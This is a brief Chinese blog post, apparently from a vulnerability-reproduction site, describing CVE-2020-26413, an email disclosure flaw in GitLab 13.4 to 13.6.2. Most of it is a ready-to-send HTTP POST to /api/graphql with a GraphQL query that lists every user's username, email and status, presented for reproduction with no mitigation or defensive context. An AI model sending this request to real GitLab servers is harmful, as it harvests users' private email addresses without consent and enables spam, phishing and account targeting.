GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413

作者: print("") 分类: 漏洞复现 发布时间: 2021-06-18 14:17

GitLab 13.4 – 13.6.2

访问 URL http://xxx.xxx.xxx.xxx/-//graphql-explorer

具体的包

POST /api/graphql HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 212
Content-Type: application/json

{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null} 

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注